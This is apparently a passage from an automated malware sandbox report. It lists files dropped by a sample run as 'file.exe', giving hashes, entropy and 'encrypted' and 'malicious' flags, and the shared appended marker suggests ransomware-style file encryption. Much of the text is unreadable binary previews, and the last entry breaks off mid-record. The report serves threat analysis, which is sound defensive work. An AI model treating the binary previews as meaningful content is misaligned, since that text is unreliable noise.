          Preview:2023/......s....W.4f.\^.$|>C.%..pw}WV.......>.2.fo.c!.;.....w.f2ZA.X0I&.F.!&...6..@.....H...8.#.f.......|@.i...\..3...I........|..N......cC....r?~.k.A....>.:._.X......n(....N...#...2........@zy....P...,_......O...JK...I../;p9.....p.[...E..".R.db....*...!.....Y...?8.).....N..>{.H.].Ak.Ce...`=Q.h...U.`0b.......k.=.4B.Ug`....c..O.8......VY-+2....|...9>.M.4..7&.\.b.r)...*......Jk=...U..S..~)o{..*.6......SD....].A#.,b..H...\8..........F.J..@.E..F.<...zT.."....g...*.OJ...4.S..l.1.HT`}...(v....oN..;},.l......!].3;...-...-..{..i6R.....KK.bC.i`W.l.Z.6.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):170742
          Entropy (8bit):7.998723797475918
          Encrypted:true
          SSDEEP:3072:Nbw2zbKa04xgF10EJtW6gAFKLa9Gz5ZcdGCHEijtRYLJVYtG3kXYRzk/CsqVu:9hrgsDvAFca8OGy5sVYDXOkTJ
          MD5:4F5CD5F63B0DFD3734AA9A8E87B4D843
          SHA1:7AEDA7360D5314AD1B79A9719DE35858B9497F2B
          SHA-256:FE8437DB6B9E01D5C3D46D4789160F778BC4625FAB8B532C10B25418D80FC2D0
          SHA-512:FDA02228CD91D47E4716FC8756C12F44B178FFF5C6CC9862A49240E5F26B8DEC5D1EF01CE4B4FD226E92DB2DA67BC95C90524BB9DD6C573FFA708350B8A52093
          Malicious:true
          Preview:............:^.....9K .?.......<...K.9...dg+R.X.7,.`.S.]..6...Q........'..."..q......\...y...C..:......Q......c&.M..Ud.....3q,..s..M....T..rA@..s.0]..P..H.|..:x?..=r.#..HO..{...._..)D....y.......(.O.=j.W.@=.k.....z/......@I^../...........{x.C.-..5..:..Mj......H..E.}.~...P.......>I.L@.[..*m..C.B$.}{zZ...i../..G..\sXC.)....w..a.D.2Z..i..x..[<..Yy.:.[.Q+.F..sN..E.....Y.P..o9..h.m....|.'.U..L..=.Z.7.....*...p...l..Z|x.Z....8.,.Hk.rk....v...3.NXf...^.0I._......^ e.{.oT/.J.hl...-[...h..-.]..wS"..\..#u.].....,.>.m..m7....B..0^.h.s....[F.\G..........h0...........9V..1..6..:....:*...... .#...0.i...aJ^C.......i.B.u......-b.d.1........f..S..]...Zc).....C.A.Pf4S.H.=atVU....,y;.C..".W....{8.FQ....im.~..f...wagV+.[*.w..KOe.r."........C.^S=.`.)V......t.T^...$;.VR%.:..{.-.(...~....F...\.J.Hb.ji.....&..+.5pny.....b[..._8...Kx.}....J....i`9..7u.C...\..L3Y.j.B^/O...../D.rk..S.....-.&.I....?o|7^o0...l]....L.....b.W.YG...X..G1E.$..F6..\....D..Q".k
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):350
          Entropy (8bit):7.247825247738725
          Encrypted:false
          SSDEEP:6:5XbnBuVbgldT/DwTyOE1q443N18HRKItQPiCeFjGxssZacii96Z:1duVbgldTLIv8HRKEhCeFixpZacii9a
          MD5:864824C9BFA4F92F96C5B14459B423CD
          SHA1:4D1CFB9CB9C3B2D9220765D971E692666829DF1E
          SHA-256:D89C3B9B99FB78081BE8697BDE52A0B108F14BEB9640C8D35AA66AE8F0503D8F
          SHA-512:2F757A8C88D09846A2516DE193477D0D110260093EC3AC78DA136599A6A850DEE87E219F6C593A6596AF20E21DC3CDBF712DD26700FCF7D0B16A4AA0241D2FB9
          Malicious:false
          Preview:.....@....P%.`7.....zkd@..V..X.uJ..p..G'K.55.+1..].QE......e}..D.n..e.......u.a.j...Y..D..p..fnV.z.+.....O..j..2.Rp..k.Z.V.?...X..K..&.o.e..=.#>...JVd.6l..w.}.......V.?.5......(O.........<.H+..>..a..Ib#..).i...U...K.zM..-.3..^a.(9.$....G.7...l.....d..$..!...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):176487
          Entropy (8bit):7.998519930178919
          Encrypted:true
          SSDEEP:3072:PO9r7+rkq8AfYYIkP2kheW0SrOjj2oYUcNDVbO4FjzXCmgvUlzenNslRla/enfUw:PKr7Dq8AfYRkP7hnuj25U+Jbp6mgvrUH
          MD5:B207179A530DC23E42E15EEED72BB229
          SHA1:F9F1EBB75D652EA27A73F220F019D47A011BCB04
          SHA-256:015893123915A69F27A2FAFBED9818126F698B4B94D4A9171E956A970FE97919
          SHA-512:ECDCFBB0A02BCC8974DB71DFDADDA74E86DF9B1FB82F61708847F1D8096B8BF791FD77EBCDA104073E2BC18D4D4F9647FE4CD8E4BAC5F421B03FC5A696F7B390
          Malicious:true
          Preview:.....'2..@..4../.......}9.c.w......S-...-.U8.<.I.i..$.5..b.~.....v.....?o._..........T9CB....k=>.......*.N......\........C..Qf..+h.!v.x,=g.......mL...c..r.j=S..6..TE....|hKvyO.......g.I.......0.T..i"..o.........[...F...M...>/..H&..@...C..qU......v1.....~...Yr[..N...#a..GyZ....M.............0...o.E.+.^(. 3$y.^.W....>..'mP.Y."PIR&.........z...O7.\....B~6....m..p:".8.p.5qE?.._. ..rA&O...R5.H.DHV..]......Uw5).......T.lY.I.A..2.hZ.yL.O .pU.p.6..Em.G.c.x...kQ>...O...fO.*+.i....t..(....*...X5rE8${.9..F.....J.?\7..ln..e."...S~..28.so.<gv.eA..&.j_>As.`.W..^L....FQ..-9.n..JS.....2#,..lQ..99zF.....+...b...b..+.l..C..r);.XP..}.m....P..@]..1....T.3..I..w7.($.&.=;..(.....5.d.).....C#.wc/.F..Z...r.>Q..1.......u.(zM`.....uL...$4./..1.kQ....i:L?\.V..8.. ;.A....&.~7......t.^.[...l..X.......+...RKi6.tn......NP.|>.. .5..Q...eqh....T.E.....1.G)...%-Bbw.Z.>G.....Y..NU..F-....\.KI.[\..Y...cg'.X.....sl..`zF.e..j.[JE.P..C.....|.p.=vD....Z.;>.m..q..8..J.C..\:
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Public Key
          Category:dropped
          Size (bytes):350
          Entropy (8bit):7.245309291963767
          Encrypted:false
          SSDEEP:6:j9x9Ki2q5ywICOmKnOzND1ao2U6xKxXEdG3Rfqgl1PbPWU4d/jGxssZacii96Z:jz0i2qswqOzdrX6UH5qgnPbaixpZaciD
          MD5:A1674A2C2CD78F1A94A85ABAEA9A82D3
          SHA1:478EBF2FBF4545F7089710ABAB797FCF4EBA4F04
          SHA-256:4FEA94C42334554A37BD0B8721CBC703E2A05FC3A412B6800BCE3E215F902651
          SHA-512:85349A1DC20906F12DEA919CA61DD9F03D0A50BEA790FDB79C9227D5CEC7550009A079DC21C13041420516F74A10573D4DA586C0A0C29CC63E566A2FDEA46DE6
          Malicious:false
          Preview:..m...& >....t.9.,|....r.Sk.%s..]G. ...<..8..\.U...p......"...0...tX..022......d.(@......B..$...6.3.08.(.E.._....R..<.k._..-P.g$li<... \...#_....9<g".......f.8{.....e B.#8..=.....E...r`..bnO..V..=..\.;.R|....~Q......G.-b.8.7.RF.4a.;u.R..3.fX@..L$..MCQl...<1..|..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):156339
          Entropy (8bit):7.998677542576092
          Encrypted:true
          SSDEEP:3072:rL+QvtW2H3n5DxD8DPtJa/KiYChF8CmclL7zCimLjP6wyvRAPdnhdx/wr:2PE9ItJa/KTCh29clHBwyvanhdxIr
          MD5:45E7418C5AF723096164EBA9571D756B
          SHA1:98C692345CE1F16C487B2A09203656B9CDC80934
          SHA-256:596F029DE90BD94808588829D255456C2E8F4B67B8059DECD8C708DAB9D1E34D
          SHA-512:C1A3A936770AA2416F6C360BB7F601D2FC6E69793E34FAD8A49B112559729B47E199FE86462E3C29ED0DF3460DBBE66AC772196A9E68C8D4B393079AF33C0392
          Malicious:true
          Preview:.....8.*#...A...@./.....c.Q.m}...@.........d..\.{SL .r^4k/".m.`x..m...AF.z..!ZF#."...#.....]...\.*.....h1.5...z.'...E.....Y.&..._..b..ZLe[..X. .......I{.q4.Ub[7..x......{M..M.,;..Tom.#..e3-.2y..\?..U.N.qj.../..0..I.?......L.6L./=.k.x.....YV....,D.HzZP`. ...?.J.H.WC.X5......`....2.x.Ud.....8.....6U.>.j..1.X..w=..T@s.^R..r..ny.y......[..@.....Y.e....=G.*.m.u...uX.(eF.oaE..S.._u^.'..q.;-d.^.(O.}.)^...p...9...r.{..e..^>wf..}_iQyE..Z...W../..cB{x.>.t.7)...C@.e.KK"k........^x'.....X/.#w0.F.[...R..G.B..S...J.L...F..=.Y."...i83<... )|.q...l.N.;.(.....wb.(.L_..8Q.....b..t...C.l.A.....X..h95}iDZ..U....Q^......v...L.X..7"d..>G..I.M....]6.U..U.Wf.}Z@.z.a.[,wj....q.(.Z.P..q.B.S!W.{....H..}.......f=...?Ofl5...#O.....%\P.Ka..1.Nhtd7Q..4{.v7..3S......:.b..Y._...............7.o6.p...$...-+.....j.....'..4...P...L.t..Gp8N.._...@Q.A-....b..?....m.?..,g^.Z.j6...-..]..A.{$..-...~.t....!.X.F.%2.~k.M..u...U..$.....q....x.s.....m"m....#....7&....5...:d..e.a.......#...%f......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):350
          Entropy (8bit):7.218286115088334
          Encrypted:false
          SSDEEP:6:hPEAywInoRdF8Z9/Z/7OsY4ieyYUjVgjltLiFdaTGg6jGxssZacii96Z:Anm0F7OsXizoA/aTz6ixpZacii9a
          MD5:C4563721B1CAABC3C2A24F0CF65F94A3
          SHA1:76E559DF8FF39BA812E3962AAA21C4D460730422
          SHA-256:9E9B4B19CA180E923CD8A6732B92D548CC0AEEC0752C8FB8BEE63C0504E898F9
          SHA-512:900137DFC89339D74517F2AA88BEC7DD48DCEB6D61AC9A3D2A04399D4A0584D355A50FC3A1F38C0807B2E36506AF23B5AAA3A0693077A7C12360B951F346BA08
          Malicious:false
          Preview:.[..r.b.8.....7B.]..f.1..-.........o._...].........Y.....y....5dv...>...9`.MYN.k2.2&...$....'.}..(.2h.l.3....s.....],]x.(8......*.n..P...'.`N..6.....<.}.AG.a..^B.Nv.'>.5w%.d..n....?g...|.rZ..f.Z....E...}.+.8..IO..K..[...p...>A.'.....e.T...h,L[..}T...V1/N{.....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):163379
          Entropy (8bit):7.9983921130580375
          Encrypted:true
          SSDEEP:3072:XAxYBFvAqUfGW7fmhahKqUkgHSznOXPvdECTc1oxquBUuZi0vldMbi:XAKBFvk+W7eha4C5naTtziEikdMbi
          MD5:44ABED56676D17D0D1F9071A5362D038
          SHA1:0EFBDAAC992A23698CF84E74B8F19E0F9385150C
          SHA-256:95A272354073F31CCDAA2F105587F821DB52503CBD218A87ED00DB483A7F278A
          SHA-512:6A3F5DCABD64BCFB828C7ED808478AECE6B8E47B110C9C46011B985398B9681D987CCDE72624F76CEE27A9ABEB2648CEA49B265FBDFF0ACAD8EC23268CE6189E
          Malicious:true
          Preview:..........(.j....e.........4....u.j...- (ge..E...P...G.g?f#2.....M..Fu.......3...:@ .W...|....G.3;.A..|u..gT.0......E."1..Zb.1.w.|J..h.y..{.Y>..z}R4|..r.9~.$)Z.U.........T...*E...........c.V...9.\u..k....gpY.......'..........*...=Y"%.%..MpS...$..C...@'......+.YU%.}....K.....2.^( E..o..l....U...Hb?vi*s....b.t......0. +.......D..X.mt..f...-..yO.^..7..9w........>D?..8.r+ oRh...2M.:.......s.&!%Y.<ok..n...oA..?....s....^...kB`.EB...,.........X..._...1.2...TSh..M..Jo.3...m..e....g}..mQ.Y....a...l+..v.!I.xQv....*D.YCq2SS8^.....NLV.9...J9(.....3..}.v....H)..R}....._\.ax.<2...%.y.X.(..........}.m.`..r.w..........y..)..$g9I...r.... ....O..5H.m.?.Dq.O&Z..# ctLDC..|. ..=..G.f..Y..]gvb.b....X\.^*T...0....A.&D-.f.x-hP$.S..n.f.9J..O.J.....0...W....F..C.M...E...S{.'..E0.,...5q..dBV-Z.Ra.RG+S....S6.6........i...".]..:.?eY........b...`...QJ.....A#.ZA.. 3&.s.q."h..6.|.)v..g&{e=.k.(W.(.#?V0..OP....c{.&/.B.a~..E,.y8N..Vd.v.C..2'Q.\k...&.UzI...\..=.T.....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):350
          Entropy (8bit):7.283411793715394
          Encrypted:false
          SSDEEP:6:ZzD6Mk4PBJtQmGYLBnlRuE31sh5VzKkbf+u39EAq8oH6SDPAqoZjGxssZacii96Z:JD60PtQyL9n1CV+UfaANCkVixpZaciik
          MD5:A36ED2D58D572D933730E49F02EB9CDF
          SHA1:D415B034BB1CE423CEF04D1E18D2CF6372DB7FEC
          SHA-256:8B1EBFC743939D638C4B496B24D756E1DB7E3BC7D27DBAC43B5E54EF8A731DFE
          SHA-512:0BF8F7833CE0D893507089541115F435ACE7B95AC3B0228D0AFB5BCFA29674FAAD4BA143BA6958FA5F2F0385D9F4F92E89AB721F3EEEF2F79A5189BE2798E41C
          Malicious:false
          Preview:..J.G...c.R...1.[...z.5h...C.d..d.....u.....A....W.............uE........s.T.)|a..R......#..F..%,.ad.2.%...!..e.,..=.n.9..c.0.B?U.7..y.y.G.T<."0P,[|..\.c.tM.z.....rDe.G..y...D..k...8Q....Rp!R...|.....7..{2.{2IB..h.?v.|.x...Q.K...C.......#.>Y....}...a..K.:..a.Z.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):155189
          Entropy (8bit):7.99874763314479
          Encrypted:true
          SSDEEP:3072:2HY9b3p462EwOQhGftuST0LZoxO2aPw2wETzA8e6CAKirPV0DUm:Fbvl/QYHx3a+6CAnrPViUm
          MD5:1272D631C611BC0D4F6A3DD24C739C83
          SHA1:B4150C524ECF96DF7D95BDAC58421AD38D343A16
          SHA-256:9EC746B5AC8243133A80649DD5C342D6A58827C10F95586162FA8E43FE316D94
          SHA-512:ECB3101E6074977D94A533AAEE524574C4848C1AFA2024EA98F9F9E6E8375CE581A1DEEA54AE573685A36AB6CE2B529065984523F17FAE2CAFA922A0247580C8
          Malicious:true
          Preview:......R..V..+.#.$.6.....E.ql,.. .*....dZ.N~. Yq...0..|e.....Q...q.....$....-{5.....A...v6n{..Z....B"H..p}....9...1.r.nbMT.uR9.wAS.../....h..J....&A..*v...a...U./@,..f.4....Erz..e.V}X.{...w_..a..8.c>Y.7.)4.z.[..=RU.d..RO.]#.?....n'mR.D5.?./_."U..Ts....P.J.:...3.2.......].p.........U..73......w..?{..';{...g.\D2.....D3w...B.MK9.....-...9..cF.M..........G..n,E;-X?..bg.s...@,C....o.lD..[..S .<.$29..`.]..r.Q'....#.z..c..:.~....b.$..n....$].S.c..s....%h...os`..P....t.tn...,..1..Y.....r..@Z...|~Oc..u.....O..4t......w...1`}.)l...d ...-...Uo7.......zNYX.R.P....o<......4S.6j.).@S} ......4...4O;.WlA..^V)..$......`hFJ5..[...P...,.G..%5....f<l......{.[..$.*.u.o,....W.a.>.; .O.....\E...!Y.T'L}J.O+.=...|ZT.Z.F)...`..Qz9.E6.?O..8=M..E..w..`....u.......\...|.,..^J.~.2..t.[f..0.e9...@v.......WG ....*j....ZZh..rPb...JQ.o.kT.A.....p.,.\u.;#\.%..K..]i1b..h...c.;9.........y..W.\..r-a.Zo..Z..b...KC..-..&..@..JEy.t..........w..[I:FuCHY.E............A.\.....4.....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):350
          Entropy (8bit):7.372350416097228
          Encrypted:false
          SSDEEP:6:As60KjFuSKgAWKwKj7P6fQXExdrQml0db6PjsuEUCUsf9SjSRGjGxssZacii96Z:AssdKNWKwzKOrQi0dWYrsixpZacii9a
          MD5:BACC71BC0B6049A52EEF84553F86FC93
          SHA1:39C4FD3BF30E4D131CD26E4A50B66A2F0846926D
          SHA-256:810EF307D13B1A1D01ED1CFAC95B8504A4483E14DE1788F0D66DD8AFF2ACA473
          SHA-512:AF6E4192D60E6BD91FE4A09DD5FC10697F230B4AB011A42A5C57C0EB67CDC7342B63D306D6BB4737A01E27FFCB7BCAA5E6684CF1737BBAA3F4BD7B37AC0DB735
          Malicious:false
          Preview:e._.....S.q..z.f.....{.....$.Xf.h..v..ct.J.......o...ek..5......<\ p.........+.....V............SA....a`z...r...P.........."..Si.:.....[..9...l=.........~G...JZ...X..;cdi.G.`e.I~...\...G.T?y+... ...$+<.[..}q.....H(.v...`....o@SJ.]...Z.L{....f)}/...l..Js.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):155717
          Entropy (8bit):7.99834363452803
          Encrypted:true
          SSDEEP:3072:ZIDXslHf9CEpR3nhwxf4JKgAjuWLf9y5lQt+6obHHDbjIjNaExU6vt:ZIQf9CEpR3+gvH5OtlobDoj4ExfV
          MD5:CD230C6522F7F807968002F808951DE1
          SHA1:48D38DF7D6688D52584DAD970B9E67784B20829E
          SHA-256:781EFC3B80ED05A1BE443A8DCB2F6204E8A501BD47EA304C7F4866DA3C70A68B
          SHA-512:9B5E16BBC35B00C368F6A7847FF7423B8D90C03B02FFAC4444BA340FB9292592BEC930BD484673E0CB5FFBE5091AE1A0C529E4166A59227EB8A84EADAD151919
          Malicious:true
          Preview:.........s.SMU.5.Y..Ms. ...d..!....05.W...;.>D..~..Uwc.....jk...[.".7.n......:.@r...T...h.+.....e.!...nD.d....{p.....~Hj.g.j.{....IN...}.. ..z...X.PK..,)..AH)......e..Mn.......].......X.Nx...4;3.....-.c%...:...%_.t.j`Os.e..>.......^b|......r.....Q..F#J.%~x(...j.Y..vQ..V....[W6......R...m.`..qs.S.._...M.'..D.GJ.}.Z..(uiNr..F.YP.k.....,....-.fN....?..|e...4..6.?...Y.c.tbi....4.|...D_k..y9...!..|..?I..4.oW.\..,e..J.1...f.s'...G7b...*0..H.......3.?....E..@.....#/s....;..J..]....#.....~..x...f.V..YG...#;K..BC.f..#...<.x(..=. 4..f.._.?n..o...P........;.1.w.J*(....Q.b.s.....,.f^..#.|.......FGf).....D..M.,..Nu..5.#+.#..wU.1Evd^l._|{..YK.S.q).(..n..\....i......{.r.E........[?..*d#.L=.xD/j.^..Ab......*......."c.aW.....U."{..I.x.T. ...2..Yn...a../...R7K'.<.t..x..q..J.I.a..5..P..xtG.6..+8....G!F...b.n?0.../.tW......P......sx5...P.._...K.z.K.4..;..=...v'....DeB....r9..^f.Q.\}......j.0...*7<...dwL...R.....6..@...m...... Y...n>..K.*..7qr.8lh-.q.2T.>.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):350
          Entropy (8bit):7.191724370755224
          Encrypted:false
          SSDEEP:6:bvUrr2g/NgZxcFcZXVqHb2ZOm+RIOC6CvHNHG9JQMOWacB0/oYjGxssZacii96Z:bvE2g/OZWSZyRIt60HEzacB0JixpZacq
          MD5:72D45540A42C087AE598B794DEBC2712
          SHA1:05744C81C262CD7FAA9444AE4DF2B3E9EC20BBED
          SHA-256:B2483DE3A29B2F03E8F58EBA96DB65C0DDD8299583320E4A2964C67060FBDEBB
          SHA-512:0CD7499BAF9A714F5D3F856A5EB116C8C0CF5846A64BA64E0F8F7A8276B3E67BEA1C9975B0F8EE716A8ACF6F138EE3D08E63AB698C971E795DAF2C9FA45E8C1C
          Malicious:false
          Preview:.U6.,J.n..r}V.4..z..{.O.=w.0.......9.....k..SI01.3.E..$N@..I.,.......E'.p..0.]...."R`.....cxJ.0..7....Y.Z........s...M~.xi.yh^!a.[...+|j..].x.I.4T.i....G...+HNj..,'...V=.y...^A.ZI.vc..6.!z?\_...l;.w.......:.}E.M9..|.. ..:.U.]R..k...6.g.Y.H]....#...45Z.7.*r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):29006
          Entropy (8bit):7.993282256909178
          Encrypted:true
          SSDEEP:768:wYSAa8LXeOTmRXLSqYVTG1UzCCVNhuvYGyI4M:wYSAa8LuOaXGXVToBmjIF
          MD5:03F66D00A8257BE7F1B245CF4B6A9108
          SHA1:671C23418402F5E1272FDF9060D6CE47F5964DCD
          SHA-256:EE7C38D99997740B05E9050CA024857C6FBC2604264AE1B9F74FD51C81A63B4E
          SHA-512:EBE2E0A59B68F77EA04B7F6EBD7DA2129136D06A50E370ECBC5CC6CAFAF300AA3D863922DBBA26A029D83ED7FCAB710EAECC9D2F5A4EE325BD2E7409B4CF4EB4
          Malicious:true
          Preview:SQLit<..o.:.....J...|Rl...E....6nc.[...Q.....|..............D...gkg..E.c...]Z?SQ.....t$..`...l.p.=....;0O...u.<......1b..-.6.M.db..W?Z.0q.Rr....._.nU....T..]).r...Io.%....*Z........2gN>W.d...[(.3Aq.c....Z......W..81...WO..;.?.k..j'..R.....@j..M{\s..)+d.4LB..<ir{.}.@..>BX.p......X.....U.2..:.x{.2B......0=&..hf.&..r...=.X....I.>...j1...w.(..P,*.&V...Y.S|.Y.bv....v.<^<."sX....J..|..."Qi.Q+q.i..a.6.8..l.......1.e...oA.f.wN,......o>..?...R.Jzi..?..f.^.+.Xu~*Y...=..M..@.>..[.....!#S.y.,.A^p.........(.Z....O.....cc...q...:f-....Gd2)....xBn]...t...i..Y.?..DR\.j@..v.14.p_..8p...o..{.B..B..b.'~..U.2.g+..(...D...T$..].U....q..P...LOP{.i...W...?.p?.j^...q4...y...&e." )z..._D...X...j.t. ...u.C.b.C......9..w....b.5.]..L.Ss.K..X.#.D.........rK.X...{...UW N]z)...~..;.N....P~..5M.IL..81.|FR..C.!.]......#..ygp..t.1.......x...b...........e.}...4..P1..8....3.f...Q.1?..:HO..1t...84.Os..,-......9.....~:.n..4j...........*.D0...&N_T4.v../..F.....f9.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):499
          Entropy (8bit):7.418370042748162
          Encrypted:false
          SSDEEP:12:qm7YlaKt9SKHsnlTztbry6slvX3FqkaSm0ZCMDIGixpZacii9a:qm7ET/VAlHpybVX3FqkaSm08MDIGiTkX
          MD5:3B26F905F06233CC1698882F26C30F85
          SHA1:A32D70369F986DC1A2329F5B9093A65122AC210F
          SHA-256:BCF4C976027936563E30EF2DD12CBC936C37299B7D003811161680971CA619FE
          SHA-512:C77BA809B27E33CEDCDC1A64BC65BBC86AAABB85F096758AC0ABA8146CC46942B57A21DE8A46B4BB3469DF6B1B3155AD841A02B80B4684C4FD8BC0B43B25AB66
          Malicious:false
          Preview:........d./..........F.qhU.<.2.B,.2..l..,p..5.c...G...:e...(.yN.&..}.JS..5d.qC.A..p..d....Qq....A..>..?t...*.+A+0WHh.];.eT|.....B.-.[...4.....,..c..... 3<*..o.+CeK..t.7.%...@..o.2-.?a?....0..6$(.#(.j.....]C4. ...].C[/e.ie....$...,...C..H.../3.E=!.R.D..1.>(.[Tdo.....B....t..~r.[7D..)g[[...V&W.......N...nnX|.....rk...y..i.T9T.^.........,x.kg7.....l.3~.:.D..o.....c'M....$...b..75.v....Je.^.....7s......=r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):14258
          Entropy (8bit):7.987013187735564
          Encrypted:false
          SSDEEP:384:pnqdHItWgQuKU0KlhNfBtZIBos8ZMe9He2dgpQPLe:NqdotzXxZYos8ZX9zq26
          MD5:6C9620646A45041CD61CD96C5EB37376
          SHA1:49991BD5A0612C43FA6C32E643AF71FB7D8AEA3F
          SHA-256:737DFBD39FA298401188FDDDAA1EA06FDE1F9EBF5E7B64920DAD321A540DA6F8
          SHA-512:411953C1A11B4DC00AEAC9D62AF2151E0AAECB0BB4F471FFE7B39FCBF1277E7A2B370A14C4E5C86FA3C648687EB33B5BDDD53F371EF48F217FF61A9C37823A10
          Malicious:false
          Preview:....T...0.Ty_:..Fy....r...O.')..Ov........_...<4.d..{..5....g.7....Rb...m.g.x....."..t)..;..G.d..'C....G7A.&+Y.fx.:2WoF..L}..::.:G...%.6.7..O..Q..!.?...'...S.x_3'.:a.Tm<..?...>u.&.d....t...|#B.....fn>z.3.o...`..r.!...^.Xi.K.o.W...Yi{.+.'T.".e....a;.....!B.h-.......1R..eY.N....B6..l...2-.;G.B'........*h ....].8A..........]....svY..8.z..Z4..e.CJ.N.<.,....n./~.P.h<...X.l....9...Q...X.&.H..,.....N..,.0..9.Km..($j..{s....Oe..L3..Q.V.'..........z.'..[.'.yp1...C.....e.. ...Q+.!.......f.1...c.W.8G.....Z*7..B.|@n.....v...T.r...O..K.....;.7+3...J/..9..o[^.WLi..9FB, ..U..hz)..&9G@.h7..s.[.t.'..'MI.H......0.E....k}$.4~j%e.P.B..m..9..:.4...}.>.s..2b..J.....H.i^2......P...C...w@&.BI...[..o...2Y.H...........?.!....R.sQ.yo..P...&+..DY..p}...GWA.s......q.I..Y..].E.l.Yk...Q.R.X...O...K?..q..`o.o..9.G..d....c.-(6.......y..$F...p..u.p.-..f.wqu...Q"Q@..z.qg.Q....'..a./.1/...B&..).-.EO... U....$#5...m.,....#..|e........".Y....E........)..T.7......z..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):347
          Entropy (8bit):7.322509865635489
          Encrypted:false
          SSDEEP:6:4djtzsmyKAEid++jIBFD97v6lD/uzySePBS8spGdqAxJl2vwOVHGzc8VjGxssZaX:Q+bKAFdFMBTr6lD/uzr6SBG3l56mzzV1
          MD5:49D4697AF9F5157F86080B365183E6EE
          SHA1:99CF6716F7E73805F7E200E2EE0325C3258A3878
          SHA-256:82C774213AF91A98A41B8FF36116EDD711D1A35BA25DEA2CDD66EC7356E44A87
          SHA-512:34F8F8F01AEFEABCF722F42EE0A51F199DEA8080E5A92708294D73A2F79DA77271604ADA61B66CBAF36D7074E8E55D3CA91E8018A3C49EC86CCDE9AB417AF3FA
          Malicious:false
          Preview:....:..8g.5Y-&.^c...P......'..h.... e.6K..*......z..R.*.......].....a.$.jT=..H.o... .}4.)4..l....`./.....#t.~..s..%.......^...Kb..TA...`m+/.]...@..&.5/L...'U.3@..........b..._..m....K..i.ZC...>......M...R..:.>./.H.H..A.,..nO........nB.M.x.....m...].d8.2.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):392382
          Entropy (8bit):7.294067188497114
          Encrypted:false
          SSDEEP:6144:XOhWPpp6O4rs7+g2c0fOj7xK92KsXpqQC7SaPGNFzq/RnfAmn+qGk07U0z9zMfpX:XDPpp6O4YX2c0+KEXXpqQMLuNy5Ymn+u
          MD5:061B87C8A185D2E33E9A2C88C6DBBEE2
          SHA1:CBED04462AC4DFF82A84E4465F0EF47D01B4CACE
          SHA-256:A70166EFD7A54E40FB8BA07CCF4162F10759487F42CCE1C6CE71287F24B192DA
          SHA-512:86A1913491BDF9634711F0630FEA2EED063ACFE80B552033D36FEEE2D9F9B539419821FCBEBB136F7F69413BF5C3C608CEA9836EFB4CCF60D1805F909F5A58E6
          Malicious:false
          Preview:....T....X.J..fV`.....R..:./...w.e......T.....8..J.Q..-...<...kn.n..J.q.[C.*.......@yA...m.x....T.....9........X...4...GQ.Z<M..?.6..i...3.r~O.4.N.uw.....T0.........pr.@1........Sv6.B...A(.|.L..A..J.P...6.W>#:..>..].......l.Zc..\'...I./...tm9..A..I...........r...m.r+.j.@....{].+#....,5.U...K...Wv.M..+/..?.$F....<...GB.f/x.te.....F7q.....S....5..P.*.'..........kw..c.+..xy1.Z.c*.5.B0i.....H....st.b.......w".c.e.[..i<.Ln.?.)'}.....pL..m.9.C.....ci....UL..9.~...>t....i.)..@.N!..~5.,a[..+..4..D\.<..h>.n...s..1.M...2.[-..3.'r...}.....]."nDDfh..}..N..-E....$...3EaJM..w.Q...gF.b.M..|...M.....R.y..p.a......qE.*..P..'..YN.iw...~......6*..&z...;.@.m..&5..j~.+....;=FgO.o....j..@...AM#..n.......<... ..$y.k6.p_...B7.....z=r.h.=...P....L.-.0s.".(._....n.o;O.....(.V4z..2:..EG...k"....:..&t..-..3...}....6g..6.5.g.}.=U.T...".SC..A....b"j.......&.I.q.$..~....... .....NLfh........j..g..`.HF.y?..M.<.....vyp.0...G.....M*..l.z.}.@X.K........D:..f.>._S.$<%
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):36745
          Entropy (8bit):7.994583237259848
          Encrypted:true
